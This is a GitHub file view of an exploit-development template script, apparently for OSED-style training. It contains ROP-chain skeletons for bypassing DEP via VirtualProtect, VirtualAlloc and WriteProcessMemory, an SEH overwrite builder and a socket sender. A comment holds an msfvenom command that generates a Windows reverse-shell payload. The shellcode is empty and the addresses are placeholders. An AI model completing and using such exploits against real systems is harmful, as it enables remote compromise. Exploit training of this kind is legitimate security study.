-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit-template.py
130 lines (105 loc) · 3.97 KB
/
exploit-template.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/usr/bin/python3
import sys
import socket
sys.path.insert(0, '../../osed-scripts')
from utils import RopChain, sanity_check, get_connection
bad_chars = [0, 0xa, 0xd, 0x2b, 0x25, 0x26, 0x3d]
def get_payload() -> bytes:
# msfvenom -p windows/shell_reverse_tcp lhost=eth0 lport=54321 -b '\x0a\x0d\x2b\x25\x26\x3d\x00' -v shellcode -f python
shellcode = b''
return shellcode
def get_rop_chain() -> bytes:
# BOOL VirtualProtect(
# LPVOID lpAddress,
# SIZE_T dwSize,
# DWORD flNewProtect,
# PDWORD lpflOldProtect
# );
#
# skeleton = RopChain()
# skeleton += 0x41414141 # VirtualProtect address
# skeleton += 0x42424242 # shellcode return address to return to after VirtualProtect is called
# skeleton += 0x43434343 # lpAddress (same as above)
# skeleton += 0x44444444 # dwSize (size of shellcode, 0x300 or so)
# skeleton += 0x45454545 # flNewProtect (0x40)
# skeleton += 0x46464646 # lpflOldProtect (some writable memory address)
# -------------------------
# -------------------------
# LPVOID VirtualAlloc(
# LPVOID lpAddress,
# SIZE_T dwSize,
# DWORD flAllocationType,
# DWORD flProtect
# );
#
# skeleton = RopChain()
# skeleton += 0x41414141 # VirtualAlloc address
# skeleton += 0x42424242 # shellcode return address to return to after VirtualAlloc is called
# skeleton += 0x43434343 # lpAddress (shellcode address)
# skeleton += 0x44444444 # dwSize (0x1)
# skeleton += 0x45454545 # flAllocationType (0x1000)
# skeleton += 0x46464646 # flProtect (0x40)
# -------------------------
# -------------------------
# BOOL WriteProcessMemory(
# HANDLE hProcess,
# LPVOID lpBaseAddress,
# LPCVOID lpBuffer,
# SIZE_T nSize,
# SIZE_T *lpNumberOfBytesWritten
# );
#
# skeleton = RopChain()
# skeleton += 0x41414141 # WriteProcessMemory address
# skeleton += 0x42424242 # shellcode return address to return to after WriteProcessMemory is called
# skeleton += 0xffffffff # hProcess (pseudo Process handle)
# skeleton += 0x44444444 # lpBaseAddress (Code cave address)
# skeleton += 0x45454545 # lpBuffer (shellcode address)
# skeleton += 0x46464646 # nSize (size of shellcode)
# skeleton += 0x47474747 # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)
# -------------------------
# -------------------------
ropnop = 0x0
offset_to_eip = 0
rop = RopChain(chain=b'A' * (offset_to_eip - len(skeleton)))
rop += skeleton.chain
rop += 0x0
############################
# EAX =>
# EBX =>
# ECX =>
# EDX =>
# ESI =>
# EDI =>
# -------------------------
# skeleton[0] = 0x41414141
# skeleton[1] = 0x42424242
# skeleton[2] = 0x43434343
# skeleton[3] = 0x44444444
# skeleton[4] = 0x45454545
# skeleton[5] = 0x46464646
############################
rop += b'\x90' * 20
rop += get_payload()
sanity_check(rop.chain, bad_chars)
return rop.chain
def get_seh_overwrite() -> bytes:
total_len = 0
offset_to_eip = 0
seh_chain = b'A' * (offset_to_eip - 4)
seh_chain += b'B' * 4 # nseh
seh_chain += b'C' * 4 # seh - ppr or similar
seh_chain += b'C' * (total_len - len(seh_chain))
return seh_chain
def send_exploit(sock: socket.socket, buffer: bytes, read_response=False):
sock.send(buffer)
print(f'[+] sent {len(buffer)} bytes')
if read_response:
resp = sock.recv(4096)
print('[*] response:')
print(resp)
def main():
conn = get_connection('127.0.0.1', 111) # todo change ip/port
send_exploit(conn, get_rop_chain())
if __name__ == '__main__':
main()